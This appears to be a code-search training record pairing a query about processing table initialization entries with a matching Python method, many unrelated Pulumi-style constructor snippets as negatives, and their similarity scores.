namespace is not None:\n pulumi.set(__self__, \"namespace\", namespace)", "def __init__(__self__, *,\n acl_name: pulumi.Input[str],\n node_type: pulumi.Input[str],\n auto_minor_version_upgrade: Optional[pulumi.Input[bool]] = None,\n data_tiering: Optional[pulumi.Input[bool]] = None,\n description: Optional[pulumi.Input[str]] = None,\n engine_version: Optional[pulumi.Input[str]] = None,\n final_snapshot_name: Optional[pulumi.Input[str]] = None,\n kms_key_arn: Optional[pulumi.Input[str]] = None,\n maintenance_window: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n name_prefix: Optional[pulumi.Input[str]] = None,\n num_replicas_per_shard: Optional[pulumi.Input[int]] = None,\n num_shards: Optional[pulumi.Input[int]] = None,\n parameter_group_name: Optional[pulumi.Input[str]] = None,\n port: Optional[pulumi.Input[int]] = None,\n security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n snapshot_arns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n snapshot_name: Optional[pulumi.Input[str]] = None,\n snapshot_retention_limit: Optional[pulumi.Input[int]] = None,\n snapshot_window: Optional[pulumi.Input[str]] = None,\n sns_topic_arn: Optional[pulumi.Input[str]] = None,\n subnet_group_name: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tls_enabled: Optional[pulumi.Input[bool]] = None):\n pulumi.set(__self__, \"acl_name\", acl_name)\n pulumi.set(__self__, \"node_type\", node_type)\n if auto_minor_version_upgrade is not None:\n pulumi.set(__self__, \"auto_minor_version_upgrade\", auto_minor_version_upgrade)\n if data_tiering is not None:\n pulumi.set(__self__, \"data_tiering\", data_tiering)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if engine_version is not None:\n pulumi.set(__self__, \"engine_version\", engine_version)\n if final_snapshot_name is not None:\n pulumi.set(__self__, \"final_snapshot_name\", final_snapshot_name)\n if kms_key_arn is not None:\n pulumi.set(__self__, \"kms_key_arn\", kms_key_arn)\n if maintenance_window is not None:\n pulumi.set(__self__, \"maintenance_window\", maintenance_window)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if name_prefix is not None:\n pulumi.set(__self__, \"name_prefix\", name_prefix)\n if num_replicas_per_shard is not None:\n pulumi.set(__self__, \"num_replicas_per_shard\", num_replicas_per_shard)\n if num_shards is not None:\n pulumi.set(__self__, \"num_shards\", num_shards)\n 
if parameter_group_name is not None:\n pulumi.set(__self__, \"parameter_group_name\", parameter_group_name)\n if port is not None:\n pulumi.set(__self__, \"port\", port)\n if security_group_ids is not None:\n pulumi.set(__self__, \"security_group_ids\", security_group_ids)\n if snapshot_arns is not None:\n pulumi.set(__self__, \"snapshot_arns\", snapshot_arns)\n if snapshot_name is not None:\n pulumi.set(__self__, \"snapshot_name\", snapshot_name)\n if snapshot_retention_limit is not None:\n pulumi.set(__self__, \"snapshot_retention_limit\", snapshot_retention_limit)\n if snapshot_window is not None:\n pulumi.set(__self__, \"snapshot_window\", snapshot_window)\n if sns_topic_arn is not None:\n pulumi.set(__self__, \"sns_topic_arn\", sns_topic_arn)\n if subnet_group_name is not None:\n pulumi.set(__self__, \"subnet_group_name\", subnet_group_name)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if tls_enabled is not None:\n pulumi.set(__self__, \"tls_enabled\", tls_enabled)", "def __init__(__self__, *,\n enabled: Optional[pulumi.Input[bool]] = None,\n instance_id: Optional[pulumi.Input[int]] = None,\n message_type: Optional[pulumi.Input[str]] = None,\n queue_regex: Optional[pulumi.Input[str]] = None,\n recipients: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n reminder_interval: Optional[pulumi.Input[int]] = None,\n time_threshold: Optional[pulumi.Input[int]] = None,\n type: Optional[pulumi.Input[str]] = None,\n value_calculation: Optional[pulumi.Input[str]] = None,\n value_threshold: Optional[pulumi.Input[int]] = None,\n vhost_regex: Optional[pulumi.Input[str]] = None):\n if enabled is not None:\n pulumi.set(__self__, \"enabled\", enabled)\n if instance_id is not None:\n pulumi.set(__self__, \"instance_id\", instance_id)\n if message_type is not None:\n pulumi.set(__self__, \"message_type\", message_type)\n if queue_regex is not None:\n pulumi.set(__self__, \"queue_regex\", queue_regex)\n if recipients is not None:\n pulumi.set(__self__, \"recipients\", recipients)\n if reminder_interval is not None:\n pulumi.set(__self__, \"reminder_interval\", reminder_interval)\n if time_threshold is not None:\n pulumi.set(__self__, \"time_threshold\", time_threshold)\n if type is not None:\n pulumi.set(__self__, \"type\", type)\n if value_calculation is not None:\n pulumi.set(__self__, \"value_calculation\", value_calculation)\n if value_threshold is not None:\n pulumi.set(__self__, \"value_threshold\", value_threshold)\n if vhost_regex is not None:\n pulumi.set(__self__, \"vhost_regex\", vhost_regex)", "def __init__(self, args, motor_entry):\n pass", "def __init__(self):\n print \"ABC - Deployer.__init__()\"", "def __init__(__self__, *,\n cidr: pulumi.Input[str],\n resource_group_name: pulumi.Input[str],\n commissioning_enabled: Optional[pulumi.Input[bool]] = None,\n internet_advertising_disabled: Optional[pulumi.Input[bool]] = None,\n location: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n parent_custom_ip_prefix_id: Optional[pulumi.Input[str]] = None,\n roa_validity_end_date: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n wan_validation_signed_message: Optional[pulumi.Input[str]] = None,\n zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):\n pulumi.set(__self__, \"cidr\", cidr)\n pulumi.set(__self__, \"resource_group_name\", resource_group_name)\n if commissioning_enabled is not None:\n pulumi.set(__self__, \"commissioning_enabled\", 
commissioning_enabled)\n if internet_advertising_disabled is not None:\n pulumi.set(__self__, \"internet_advertising_disabled\", internet_advertising_disabled)\n if location is not None:\n pulumi.set(__self__, \"location\", location)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if parent_custom_ip_prefix_id is not None:\n pulumi.set(__self__, \"parent_custom_ip_prefix_id\", parent_custom_ip_prefix_id)\n if roa_validity_end_date is not None:\n pulumi.set(__self__, \"roa_validity_end_date\", roa_validity_end_date)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if wan_validation_signed_message is not None:\n pulumi.set(__self__, \"wan_validation_signed_message\", wan_validation_signed_message)\n if zones is not None:\n pulumi.set(__self__, \"zones\", zones)", "def __init__(self, name: str, instance: PartInstance, controlPoints: ModelDotArray):\n super().__init__()\n pass", "def __init__(self, name=None, acronym=None, agency=None, payloadMass=None,\n payloadVolume=None, dryMass=None, propellantMass=None,\n specificImpulse=None, massToLEO=None, reliability=None, cost=None,\n meanTimeBetweenLaunches=None, _id=None):\n self.name = name\n self.acronym = acronym if acronym else name\n self.agency = agency\n self.payloadMass = payloadMass\n self.payloadVolume = payloadVolume\n self.dryMass = dryMass\n self.propellantMass = propellantMass\n self.specificImpulse = specificImpulse\n self.massToLEO = massToLEO\n self.reliability = reliability\n self.cost = cost\n if isinstance(meanTimeBetweenLaunches, Number):\n self.meanTimeBetweenLaunches = isodate.duration_isoformat(datetime.timedelta(days=meanTimeBetweenLaunches))\n else:\n self.meanTimeBetweenLaunches = meanTimeBetweenLaunches\n super(LaunchVehicle,self).__init__(_id, \"LaunchVehicle\")", "def __init__(__self__, *,\n config: pulumi.Input['ConfigArgs'],\n instance_id: pulumi.Input[str],\n location: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n project: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"config\", config)\n pulumi.set(__self__, \"instance_id\", instance_id)\n if location is not None:\n pulumi.set(__self__, \"location\", location)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if project is not None:\n pulumi.set(__self__, \"project\", project)", "def __init__(__self__, *,\n auto_upgrade_minor_version: pulumi.Input[bool],\n force_update_tag: pulumi.Input[str],\n location: pulumi.Input[str],\n publisher: pulumi.Input[str],\n resource_group: pulumi.Input[str],\n type_handler_version: pulumi.Input[str],\n type_name: pulumi.Input[str],\n vm_name: pulumi.Input[str],\n protected_settings: Optional[pulumi.Input[str]] = None,\n settings: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"auto_upgrade_minor_version\", auto_upgrade_minor_version)\n pulumi.set(__self__, \"force_update_tag\", force_update_tag)\n pulumi.set(__self__, \"location\", location)\n pulumi.set(__self__, \"publisher\", publisher)\n pulumi.set(__self__, \"resource_group\", resource_group)\n pulumi.set(__self__, \"type_handler_version\", type_handler_version)\n pulumi.set(__self__, \"type_name\", type_name)\n pulumi.set(__self__, \"vm_name\", vm_name)\n if protected_settings is not None:\n pulumi.set(__self__, \"protected_settings\", protected_settings)\n if settings is not None:\n pulumi.set(__self__, \"settings\", settings)", "def __init__(__self__, *,\n backend_type: Optional[pulumi.Input['InstanceBackendType']] = None,\n connection_name: 
Optional[pulumi.Input[str]] = None,\n current_disk_size: Optional[pulumi.Input[str]] = None,\n database_version: Optional[pulumi.Input['InstanceDatabaseVersion']] = None,\n disk_encryption_configuration: Optional[pulumi.Input['DiskEncryptionConfigurationArgs']] = None,\n disk_encryption_status: Optional[pulumi.Input['DiskEncryptionStatusArgs']] = None,\n etag: Optional[pulumi.Input[str]] = None,\n failover_replica: Optional[pulumi.Input['InstanceFailoverReplicaArgs']] = None,\n gce_zone: Optional[pulumi.Input[str]] = None,\n instance_type: Optional[pulumi.Input['InstanceInstanceType']] = None,\n ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input['IpMappingArgs']]]] = None,\n ipv6_address: Optional[pulumi.Input[str]] = None,\n kind: Optional[pulumi.Input[str]] = None,\n maintenance_version: Optional[pulumi.Input[str]] = None,\n master_instance_name: Optional[pulumi.Input[str]] = None,\n max_disk_size: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n on_premises_configuration: Optional[pulumi.Input['OnPremisesConfigurationArgs']] = None,\n out_of_disk_report: Optional[pulumi.Input['SqlOutOfDiskReportArgs']] = None,\n project: Optional[pulumi.Input[str]] = None,\n region: Optional[pulumi.Input[str]] = None,\n replica_configuration: Optional[pulumi.Input['ReplicaConfigurationArgs']] = None,\n replica_names: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n root_password: Optional[pulumi.Input[str]] = None,\n satisfies_pzs: Optional[pulumi.Input[bool]] = None,\n scheduled_maintenance: Optional[pulumi.Input['SqlScheduledMaintenanceArgs']] = None,\n secondary_gce_zone: Optional[pulumi.Input[str]] = None,\n self_link: Optional[pulumi.Input[str]] = None,\n server_ca_cert: Optional[pulumi.Input['SslCertArgs']] = None,\n service_account_email_address: Optional[pulumi.Input[str]] = None,\n settings: Optional[pulumi.Input['SettingsArgs']] = None,\n state: Optional[pulumi.Input['InstanceState']] = None,\n suspension_reason: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceSuspensionReasonItem']]]] = None):\n if backend_type is not None:\n pulumi.set(__self__, \"backend_type\", backend_type)\n if connection_name is not None:\n pulumi.set(__self__, \"connection_name\", connection_name)\n if current_disk_size is not None:\n pulumi.set(__self__, \"current_disk_size\", current_disk_size)\n if database_version is not None:\n pulumi.set(__self__, \"database_version\", database_version)\n if disk_encryption_configuration is not None:\n pulumi.set(__self__, \"disk_encryption_configuration\", disk_encryption_configuration)\n if disk_encryption_status is not None:\n pulumi.set(__self__, \"disk_encryption_status\", disk_encryption_status)\n if etag is not None:\n warnings.warn(\"\"\"This field is deprecated and will be removed from a future version of the API. Use the `settings.settingsVersion` field instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"etag is deprecated: This field is deprecated and will be removed from a future version of the API. 
Use the `settings.settingsVersion` field instead.\"\"\")\n if etag is not None:\n pulumi.set(__self__, \"etag\", etag)\n if failover_replica is not None:\n pulumi.set(__self__, \"failover_replica\", failover_replica)\n if gce_zone is not None:\n pulumi.set(__self__, \"gce_zone\", gce_zone)\n if instance_type is not None:\n pulumi.set(__self__, \"instance_type\", instance_type)\n if ip_addresses is not None:\n pulumi.set(__self__, \"ip_addresses\", ip_addresses)\n if ipv6_address is not None:\n warnings.warn(\"\"\"The IPv6 address assigned to the instance. (Deprecated) This property was applicable only to First Generation instances.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"ipv6_address is deprecated: The IPv6 address assigned to the instance. (Deprecated) This property was applicable only to First Generation instances.\"\"\")\n if ipv6_address is not None:\n pulumi.set(__self__, \"ipv6_address\", ipv6_address)\n if kind is not None:\n pulumi.set(__self__, \"kind\", kind)\n if maintenance_version is not None:\n pulumi.set(__self__, \"maintenance_version\", maintenance_version)\n if master_instance_name is not None:\n pulumi.set(__self__, \"master_instance_name\", master_instance_name)\n if max_disk_size is not None:\n pulumi.set(__self__, \"max_disk_size\", max_disk_size)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if on_premises_configuration is not None:\n pulumi.set(__self__, \"on_premises_configuration\", on_premises_configuration)\n if out_of_disk_report is not None:\n pulumi.set(__self__, \"out_of_disk_report\", out_of_disk_report)\n if project is not None:\n pulumi.set(__self__, \"project\", project)\n if region is not None:\n pulumi.set(__self__, \"region\", region)\n if replica_configuration is not None:\n pulumi.set(__self__, \"replica_configuration\", replica_configuration)\n if replica_names is not None:\n pulumi.set(__self__, \"replica_names\", replica_names)\n if root_password is not None:\n pulumi.set(__self__, \"root_password\", root_password)\n if satisfies_pzs is not None:\n pulumi.set(__self__, \"satisfies_pzs\", satisfies_pzs)\n if scheduled_maintenance is not None:\n pulumi.set(__self__, \"scheduled_maintenance\", scheduled_maintenance)\n if secondary_gce_zone is not None:\n pulumi.set(__self__, \"secondary_gce_zone\", secondary_gce_zone)\n if self_link is not None:\n pulumi.set(__self__, \"self_link\", self_link)\n if server_ca_cert is not None:\n pulumi.set(__self__, \"server_ca_cert\", server_ca_cert)\n if service_account_email_address is not None:\n pulumi.set(__self__, \"service_account_email_address\", service_account_email_address)\n if settings is not None:\n pulumi.set(__self__, \"settings\", settings)\n if state is not None:\n pulumi.set(__self__, \"state\", state)\n if suspension_reason is not None:\n pulumi.set(__self__, \"suspension_reason\", suspension_reason)", "def __init__(self, name=None):\n from uuid import uuid4\n self.inputs = []\n self.uuid = uuid4()\n self.name = name\n\n # RootAction will return new instance only \n # for first node in module\n self.root = RootAction()\n self.root.add_node(self)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n arm_template_display_name: Optional[pulumi.Input[str]] = None,\n deployment_properties: Optional[pulumi.Input[pulumi.InputType['EnvironmentDeploymentPropertiesArgs']]] = None,\n lab_name: Optional[pulumi.Input[str]] = None,\n location: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n 
resource_group_name: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n user_name: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n kms_key: pulumi.Input[str],\n schedule_config: pulumi.Input['DataIntegrationScheduleConfigArgs'],\n source_uri: pulumi.Input[str],\n description: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):\n pulumi.set(__self__, \"kms_key\", kms_key)\n pulumi.set(__self__, \"schedule_config\", schedule_config)\n pulumi.set(__self__, \"source_uri\", source_uri)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)", "def __init__(__self__, *,\n arn: Optional[pulumi.Input[str]] = None,\n certificate_body: Optional[pulumi.Input[str]] = None,\n certificate_chain: Optional[pulumi.Input[str]] = None,\n expiration: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n name_prefix: Optional[pulumi.Input[str]] = None,\n path: Optional[pulumi.Input[str]] = None,\n private_key: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n upload_date: Optional[pulumi.Input[str]] = None):\n if arn is not None:\n pulumi.set(__self__, \"arn\", arn)\n if certificate_body is not None:\n pulumi.set(__self__, \"certificate_body\", certificate_body)\n if certificate_chain is not None:\n pulumi.set(__self__, \"certificate_chain\", certificate_chain)\n if expiration is not None:\n pulumi.set(__self__, \"expiration\", expiration)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if name_prefix is not None:\n pulumi.set(__self__, \"name_prefix\", name_prefix)\n if path is not None:\n pulumi.set(__self__, \"path\", path)\n if private_key is not None:\n pulumi.set(__self__, \"private_key\", private_key)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if tags_all is not None:\n pulumi.set(__self__, \"tags_all\", tags_all)\n if upload_date is not None:\n pulumi.set(__self__, \"upload_date\", upload_date)", "def __init__(__self__, *,\n cidr: Optional[pulumi.Input[str]] = None,\n commissioning_enabled: Optional[pulumi.Input[bool]] = None,\n internet_advertising_disabled: Optional[pulumi.Input[bool]] = None,\n location: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n parent_custom_ip_prefix_id: Optional[pulumi.Input[str]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n roa_validity_end_date: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n wan_validation_signed_message: Optional[pulumi.Input[str]] = None,\n zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):\n if cidr is not None:\n pulumi.set(__self__, \"cidr\", cidr)\n if commissioning_enabled is not None:\n pulumi.set(__self__, \"commissioning_enabled\", commissioning_enabled)\n if internet_advertising_disabled is not None:\n pulumi.set(__self__, \"internet_advertising_disabled\", internet_advertising_disabled)\n if location is not None:\n pulumi.set(__self__, \"location\", location)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if parent_custom_ip_prefix_id is not 
None:\n pulumi.set(__self__, \"parent_custom_ip_prefix_id\", parent_custom_ip_prefix_id)\n if resource_group_name is not None:\n pulumi.set(__self__, \"resource_group_name\", resource_group_name)\n if roa_validity_end_date is not None:\n pulumi.set(__self__, \"roa_validity_end_date\", roa_validity_end_date)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if wan_validation_signed_message is not None:\n pulumi.set(__self__, \"wan_validation_signed_message\", wan_validation_signed_message)\n if zones is not None:\n pulumi.set(__self__, \"zones\", zones)" ]
[ "0.66051346", "0.6576527", "0.6427389", "0.63597023", "0.62879163", "0.6271562", "0.6235065", "0.6202321", "0.6141576", "0.6116739", "0.6116739", "0.6116739", "0.6116739", "0.6116739", "0.6116739", "0.61087185", "0.60978323", "0.6088997", "0.60772216", "0.606114", "0.6051864", "0.60461396", "0.60259384", "0.6024794", "0.60247785", "0.6013458", "0.6007375", "0.5995422", "0.5993116", "0.59827495", "0.59779686", "0.5971315", "0.5955377", "0.59530175", "0.5950027", "0.5935022", "0.5931572", "0.5899046", "0.5890312", "0.5888185", "0.58693665", "0.58659136", "0.5846774", "0.5840591", "0.58362657", "0.5830005", "0.58209157", "0.5810091", "0.5808484", "0.58076406", "0.580229", "0.57943755", "0.5776336", "0.5775394", "0.5775096", "0.5770291", "0.5764683", "0.5764029", "0.57589847", "0.57549375", "0.5749134", "0.5742931", "0.5742255", "0.5732621", "0.57275844", "0.57128584", "0.5702848", "0.5698831", "0.5697905", "0.56953007", "0.56948227", "0.5692294", "0.5691121", "0.5687839", "0.5686938", "0.56860197", "0.567637", "0.567495", "0.5669458", "0.5666264", "0.5664908", "0.5660109", "0.56590515", "0.56569326", "0.56518143", "0.5650338", "0.5649117", "0.5648419", "0.56473076", "0.5646023", "0.5645606", "0.5640261", "0.5635445", "0.56338835", "0.56315714", "0.5630186", "0.5628999", "0.5625867", "0.5615004", "0.5614922" ]
0.7563762
0
Process any table initialization spec from the IR desc. The IR specification may provide a set of table initialization operations in a "table_initialization" object. This takes the form of a sequence of table entry specifications.
def process_table_init(self): logging.debug("Processing table initialization, %d entries", len(self.table_initialization)) for init_entry in self.table_initialization: for table_name, entry_desc in init_entry.items(): self.air_table[table_name].add_entry( table_entry.description_to_entry(entry_desc))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_up_tables(self):\n tables = []\n tables.append({'groupname': 'metadata',\n 'tablename': 'sim_info',\n 'description': desc.SimInfoRow,\n 'tabletitle': 'Simulation Information'})\n tables.append({'groupname': 'metadata',\n 'tablename': 'sim_timeseries',\n 'description': desc.SimTimeseriesRow,\n 'tabletitle': 'Simulation Power Data'})\n tables.append({'groupname': 'th',\n 'tablename': 'th_params',\n 'description': desc.ThMetadataRow,\n 'tabletitle': 'TH Component Parameters'})\n tables.append({'groupname': 'th',\n 'tablename': 'th_timeseries',\n 'description': desc.ThTimeseriesRow,\n 'tabletitle': 'TH Timeseries'})\n tables.append({'groupname': 'neutronics',\n 'tablename': 'neutronics_timeseries',\n 'description': desc.NeutronicsTimeseriesRow,\n 'tabletitle': 'Neutronics Timeseries'})\n tables.append({'groupname': 'neutronics',\n 'tablename': 'neutronics_params',\n 'description': desc.NeutronicsParamsRow,\n 'tabletitle': 'Neutronics Metadata'})\n tables.append({'groupname': 'neutronics',\n 'tablename': 'zetas',\n 'description': desc.ZetasTimestepRow,\n 'tabletitle': 'Neutron Precursor Concentrations'})\n tables.append({'groupname': 'neutronics',\n 'tablename': 'omegas',\n 'description': desc.OmegasTimestepRow,\n 'tabletitle': 'Decay Heat Fractions'})\n return tables", "def full_initialization_process():\n\n db1 = Database('TOBACCO_RAW;')\n con1, cur1 = db1.connect()\n cur1.execute('create index idl_doc_field_id_idx on idl_doc_field(id);')\n cur1.execute('create index idl_doc_id_idx on idl_doc(id);')\n add_timestamp_to_idl_doc()\n\n create_utf_text_files()\n\n initialize_tables()\n fill_tables()", "def __init__(self, *args):\n _table.Table_swiginit(self, _table.new_Table(*args))", "def init_line_list():\n # Get str lengths from defs\n len_line = defs.str_len()['ion']\n len_src = defs.str_len()['Source']\n # Load sources to check\n sources = arcl_io.load_source_table()\n src_files = sources['File'].data\n if len(src_files[0]) > len_src:\n raise ValueError(\"Source filename now exceeds table. 
Should fix source name\")\n dummy_src = str('#')*len_src\n # Arc Line name\n dummy_line = str('#')*len_line\n #\n\n # Dict for Table\n idict = OrderedDict()\n idict['ion'] = dummy_line\n idict['wave'] = 0.\n idict['NIST'] = 0\n idict['Instr'] = 0 # Flag for instrument\n idict['amplitude'] = 0\n idict['Source'] = dummy_src\n\n # Table\n tkeys = idict.keys()\n lst = [[idict[tkey]] for tkey in tkeys]\n init_tbl = Table(lst, names=tkeys)\n\n # Return\n return init_tbl", "def tables(args):\n\n config_file = args.setupfn\n conf_base = os.path.basename(config_file).split('.')[0]\n statfile = os.path.join(args.outputdir,\n \"{}_radvel.stat\".format(conf_base))\n status = load_status(statfile)\n\n assert status.getboolean('mcmc', 'run'), \\\n \"Must run MCMC before making tables\"\n\n P, post = radvel.utils.initialize_posterior(config_file)\n post = radvel.posterior.load(status.get('fit', 'postfile'))\n chains = pd.read_csv(status.get('mcmc', 'chainfile'))\n minafactor = status.get('mcmc', 'minafactor')\n maxarchange = status.get('mcmc', 'maxarchange')\n maxgr = status.get('mcmc', 'maxgr')\n mintz = status.get('mcmc', 'mintz')\n if 'derive' in status.sections() and status.getboolean('derive', 'run'):\n dchains = pd.read_csv(status.get('derive', 'chainfile'))\n chains = chains.join(dchains, rsuffix='_derived')\n derived = True\n else:\n derived = False\n report = radvel.report.RadvelReport(P, post, chains, minafactor, maxarchange, maxgr, mintz, derived=derived)\n tabletex = radvel.report.TexTable(report)\n attrdict = {'priors': 'tab_prior_summary', 'rv': 'tab_rv',\n 'params': 'tab_params', 'derived': 'tab_derived',\n 'crit': 'tab_crit'}\n for tabtype in args.type:\n print(\"Generating LaTeX code for {} table\".format(tabtype))\n\n if tabtype == 'ic_compare':\n assert status.has_option('ic_compare', 'ic'), \\\n \"Must run Information Criteria comparison before making comparison tables\"\n\n compstats = eval(status.get('ic_compare', 'ic'))\n report = radvel.report.RadvelReport(\n P, post, chains, minafactor, maxarchange, maxgr, mintz, compstats=compstats\n )\n tabletex = radvel.report.TexTable(report)\n tex = tabletex.tab_comparison()\n elif tabtype == 'rv':\n tex = getattr(tabletex, attrdict[tabtype])(name_in_title=args.name_in_title, max_lines=None)\n elif tabtype == 'crit':\n tex = getattr(tabletex, attrdict[tabtype])(name_in_title=args.name_in_title)\n else:\n if tabtype == 'derived':\n assert status.has_option('derive', 'run'), \\\n \"Must run `radvel derive` before making derived parameter table\"\n assert tabtype in attrdict, 'Invalid Table Type %s ' % tabtype\n tex = getattr(tabletex, attrdict[tabtype])(name_in_title=args.name_in_title)\n\n saveto = os.path.join(\n args.outputdir, '{}_{}.tex'.format(conf_base, tabtype)\n )\n with open(saveto, 'w+') as f:\n f.write(tex)\n\n savestate = {'{}_tex'.format(tabtype): os.path.relpath(saveto)}\n save_status(statfile, 'table', savestate)", "def _initialize(self, chain, length):\n # If the table already exists, exit now.\n if chain != 0:\n return\n\n # Determine size\n try:\n size = len(self._getfunc())\n except TypeError:\n size = 1\n\n query = \"create table %s (recid INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT, trace int(5), %s FLOAT)\" % (self.name, ' FLOAT, '.join(['v%s' % (x+1) for x in range(size)]))\n self.db.cur.execute(query)", "def fill_table(self, executer, tree, cursor, table):\n counter = 0\n table_content = executer.lots_of_eggs(cursor, table)\n for line in table_content:\n tree.insert('', 'end', text=counter, values=line)\n counter += 1", 
"def finalize_tables(self):\n self.attrbuilder.finalize(self.ext_type)\n self.vtabbuilder.finalize(self.ext_type)", "def make_table_declarations(ibs):\n # available tables\n TABLENAME_LIST = [\n IMAGE_TABLE,\n ANNOTATION_TABLE,\n # NAME_TABLE,\n IMAGESET_TABLE,\n IMAGE_GRID,\n THUMB_TABLE,\n NAMES_TREE,\n ]\n\n # table nice names\n TABLE_NICE = {\n IMAGE_TABLE: 'Image Table',\n ANNOTATION_TABLE: 'Annotations Table',\n NAME_TABLE: 'Name Table',\n QRES_TABLE: 'Query Results Table',\n IMAGESET_TABLE: 'ImageSet Table',\n IMAGE_GRID: 'Thumbnail Grid',\n THUMB_TABLE: 'Thumbnail Table',\n NAMES_TREE: 'Tree of Names',\n }\n\n # COLUMN DEFINITIONS\n # the columns each wbia table has,\n TABLE_COLNAMES = {\n IMAGE_TABLE: [\n 'gid',\n 'thumb',\n # 'nAids',\n 'img_gname',\n # 'ext',\n 'reviewed', # detection reviewed flag is not fullyused\n 'datetime',\n 'gps',\n 'orientation',\n 'party_tag',\n 'contributor_tag',\n # 'gdconf',\n 'imgnotes',\n 'image_uuid',\n ],\n # debug with\n # --noannottbl\n # --nonametree\n # even just aid seems to be very slow\n ANNOTATION_TABLE: [\n # 'annotation_uuid',\n 'aid',\n 'thumb',\n 'annot_gname',\n 'name',\n 'exemplar',\n 'species', # <put back in\n 'viewpoint',\n 'quality_text',\n 'age_min',\n 'age_max',\n 'sex_text',\n # 'rdconf',\n # 'nGt', # ## <put back in\n 'imagesettext_names',\n 'annotnotes', # ## <put back in\n 'tag_text', # < Hack should have actual tag structure\n # 'annot_visual_uuid',\n # 'nFeats',\n # 'bbox',\n # 'theta',\n # 'verts',\n # 'num_verts',\n ],\n NAME_TABLE: ['nid', 'name', 'nAids', 'namenotes'],\n QRES_TABLE: ['rank', 'score', 'name', 'aid'],\n IMAGESET_TABLE: [\n 'imagesettext',\n 'nImgs',\n # 'num_imgs_reviewed',\n # 'num_annotmatch_reviewed',\n # 'imageset_end_datetime',\n # 'imageset_processed_flag',\n # 'imageset_shipped_flag',\n 'imgsetid',\n ],\n NAMES_TREE: [\n 'name',\n 'nAids',\n 'thumb',\n 'nid',\n # 'exemplar',\n # 'nExAids',\n 'aid',\n # 'annot_gname',\n # 'quality_text',\n # 'age_min',\n # 'age_max',\n # 'sex_text',\n # 'imagesettext_names',\n # 'datetime',\n # 'max_hourdiff',\n # 'max_speed',\n # 'has_split',\n # 'namenotes',\n ],\n IMAGE_GRID: ['thumb'],\n # TEST TABLE\n THUMB_TABLE: ['img_gname', 'thumb'],\n }\n\n # dynamicly defined headers\n if not const.SIMPLIFY_INTERFACE:\n from wbia.control import accessor_decors\n\n if accessor_decors.API_CACHE:\n # Too slow without api cache\n TABLE_COLNAMES[IMAGESET_TABLE].extend(\n ['percent_annotmatch_reviewed_str', 'percent_names_with_exemplar_str']\n )\n TABLE_COLNAMES[IMAGESET_TABLE].extend(\n [\n # 'percent_imgs_reviewed_str',\n 'imageset_start_datetime',\n # 'imageset_end_datetime',\n 'imageset_duration',\n 'imageset_notes',\n ]\n )\n\n if ibs.cfg.other_cfg.show_shipped_imagesets:\n TABLE_COLNAMES[IMAGESET_TABLE].extend(\n ['imageset_processed_flag', 'imageset_shipped_flag']\n )\n\n # THUMB_TABLE : ['thumb' 'thumb' 'thumb' 'thumb'],\n # NAMES_TREE : {('name' 'nid' 'nAids') : ['aid' 'bbox' 'thumb']}\n\n TABLE_TREE_LEVELS = {\n NAMES_TREE: {\n 'name': 0,\n 'namenotes': 0,\n 'nid': 0,\n 'nAids': 0,\n 'nExAids': 0,\n 'sex_text': 0,\n 'exemplar': 1,\n 'thumb': 1,\n 'viewpoint': 1,\n 'quality_text': 1,\n 'age_min': 1,\n 'age_max': 1,\n 'imagesettext_names': 1,\n 'aid': 1,\n 'annot_gname': 1,\n 'datetime': 1,\n 